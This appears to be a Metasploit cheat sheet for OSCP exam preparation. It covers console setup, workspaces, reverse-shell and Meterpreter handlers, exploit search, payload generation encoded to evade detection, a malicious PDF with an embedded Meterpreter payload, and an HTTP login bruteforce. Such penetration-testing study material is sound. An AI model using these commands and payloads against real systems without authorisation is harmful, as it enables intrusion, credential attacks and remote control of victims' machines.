Metasploit

Framework to manage vulnerabilities and exploits.

❗ RESTRICTED DURING THE OSCP EXAM: Metasploit may be used against ONE machine only, and NOT against the AD machines!

💡 For generating payloads, see Msfvenom.
💡 For Meterpreter sessions, see Meterpreter.

Update Metasploit

NOTE: msfupdate is deprecated.

sudo apt update
sudo apt upgrade metasploit-framework

Start & Setup

Setup

Build the database, first time only.

sudo service postgresql start
sudo msfdb init

Fix message: “To use retry middleware with Faraday v2.0+, install faraday-retry gem”

sudo gem install faraday-retry

Start the Metasploit console

sudo msfconsole -q

If msfconsole is broken…

cd /usr/share/metasploit-framework
sudo gem install bundler:2.2.5
sudo bundle install

Workspaces

Use workspaces to keep the results of different investigations separate.

List workspaces

workspace

Use an existing workspace

workspace <workspace name>

Create a workspace

workspace -a <workspace name>

Delete a workspace

workspace -d <workspace name>

Modules

Auxiliary modules (enumeration, scanners, fuzzing, sniffing)

Hierarchical syntax:

  • <module>/<type or OS>/<vendor>/<app>
  • <protocol>/<module>

show auxiliary
search type:auxiliary name:http

Listener

Netcat

Use with non-staged (stageless) reverse TCP payloads; staged payloads need the Multi Handler below.

sudo nc -lnvp 443

Multi Handler

💡 The Multi Handler is allowed on ALL machines during the OSCP exam, but any Meterpreter payload IS RESTRICTED to one machine.

Flags for exploit / run:

  • -j: run as a background job (manage it with the jobs command)
  • -z: do not automatically interact with the session

Resource scripts

Put all console commands in a file and run them in one go.

sudo msfconsole -q -r <script name>.rc

Basic example

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set ExitOnSession false
exploit -j -z

Advanced example

EnableStageEncoding / StageEncoder encode the second stage of a staged payload when the handler sends it, to try to evade detection. Note that AutoRunScript holds a single value, so the second set below overrides the first.

use exploit/multi/handler
set PAYLOAD [msfvenom Payload name]
show advanced
set LHOST [Kali IP address]
set LPORT [Listening port on Kali]
set EXITFUNC thread
set ExitOnSession false
set AutoRunScript windows/gather/enum_logged_on_users
set AutoRunScript post/windows/manage/migrate
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set Workspace test
exploit -j -z
jobs
jobs -i <job id>
kill <job id>

Example: Meterpreter reverse TCP listener on Kali

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j -z
sessions -l -v
sessions -i <session_id>

Vulnerabilities & Exploits

Search vulnerabilities/exploits

search -h

Search for a specific vulnerability

search ms03-026
search cve:2021 type:exploit
search cve:2021 type:exploit rank:excellent
search browser chrome type:exploit date:2021

Exploit a vulnerability

use exploit/windows/dcerpc/ms03_026_dcom

Show payloads

Exploit modules require a payload; if none is set, the module's default payload is used.

show payloads
set payload windows/shell_reverse_tcp

Generating a payload

💡 For generating payloads, see Msfvenom.

use windows/shell_reverse_tcp
generate LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe

Show module options

Most modules need input such as target IP addresses; these commands show what is required.

show options
show advanced

Set module options

set RHOST x.x.x.x
show options

Set module options – globally

setg RHOSTS x.x.x.1-254
setg LHOST tun0

Run the module

Returns a Meterpreter session connected to the victim when the exploit succeeds.

run
exploit

💡 For Meterpreter sessions, see Meterpreter.

Nmap

Execute Nmap within Metasploit and save the results into Metasploit’s database.

db_nmap <nmap options>
db_nmap -A -Pn x.x.x.x

Hosts Information

Services

services -h
services
services -p 80

List hosts with port 80 open and set RHOSTS to the result.

services -p 80 --rhosts

Hosts

hosts -h
hosts

Build Metasploit Modules

Building a Module

msfconsole loads custom modules from ~/.msf4/modules, so when it is started with sudo it looks in /root/.msf4/modules instead. Mirror the framework's directory layout under that path (e.g. auxiliary/scanner/http/).
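As an added example (not code from the original page or from the Metasploit project), a minimal custom auxiliary scanner module that fits the search path above: it requests a path on each host in RHOSTS, prints the Server header and records it in the database. MetasploitModule, the mixins, register_options, run_host and report_service are the framework's own API; the module name, the file path and the ServerHeaderParser helper are this example's choices.

```ruby
# Added example: minimal custom auxiliary scanner module.
# Save as ~/.msf4/modules/auxiliary/scanner/http/server_header.rb
# (or /root/.msf4/modules/... when msfconsole is started with sudo), then:
#   msf6 > reload_all
#   msf6 > use auxiliary/scanner/http/server_header
#   msf6 > set RHOSTS <target range>
#   msf6 > run
# The file path and module name are assumptions of this example.

# Plain-Ruby helper, usable outside the framework: split a Server header such
# as "Apache/2.4.41 (Ubuntu)" into product and version (version may be nil).
module ServerHeaderParser
  def self.parse(value)
    return nil if value.nil? || value.strip.empty?
    product, version = value.strip.split(' ', 2).first.split('/', 2)
    { product: product, version: version }
  end
end

# The framework class is only defined when msfconsole loads the file, so the
# helper above can still be exercised stand-alone with plain ruby.
if defined?(Msf::Auxiliary)
  class MetasploitModule < Msf::Auxiliary
    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report

    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'HTTP Server Header Reporter (example)',
          'Description' => 'Requests a path and records the Server header in the database.',
          'Author' => ['example'],
          'License' => MSF_LICENSE
        )
      )
      register_options([
        OptString.new('TARGETURI', [true, 'Path to request', '/'])
      ])
    end

    # Called once per host in RHOSTS by the Scanner mixin.
    def run_host(ip)
      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
      unless res
        vprint_status("#{ip}:#{rport} - no response")
        return
      end

      parsed = ServerHeaderParser.parse(res.headers['Server'])
      if parsed
        print_good("#{ip}:#{rport} - #{parsed[:product]} #{parsed[:version]}".strip)
        # Stored like db_nmap results, so `services -p <port>` lists it later.
        report_service(host: ip, port: rport, proto: 'tcp', name: 'http',
                       info: res.headers['Server'])
      else
        print_status("#{ip}:#{rport} - no Server header")
      end
    end
  end
end
```

Because results go through report_service, they land in the active workspace and can be filtered afterwards with services -p <port> like any db_nmap output.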

Generate malicious PDF file for Windows

search type:exploit platform:windows adobe pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
info
set payload windows/meterpreter/reverse_tcp
show options
set INFILENAME chapter1.pdf
set FILENAME chapter1.pdf
set LHOST x.x.x.x
show options
exploit

# Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.

Quit Metasploit

exit

Bruteforce Oracle Weblogic & HTTP Basic Auth

echo "weblogic" > /root/users.txt

msfconsole
use auxiliary/scanner/http/http_login
set user_file /root/users.txt
set pass_file /usr/share/wordlists/rockyou.txt
set rhosts x.x.x.x
set rport 7879
set SSL true
set threads 5
set stop_on_success true
exploit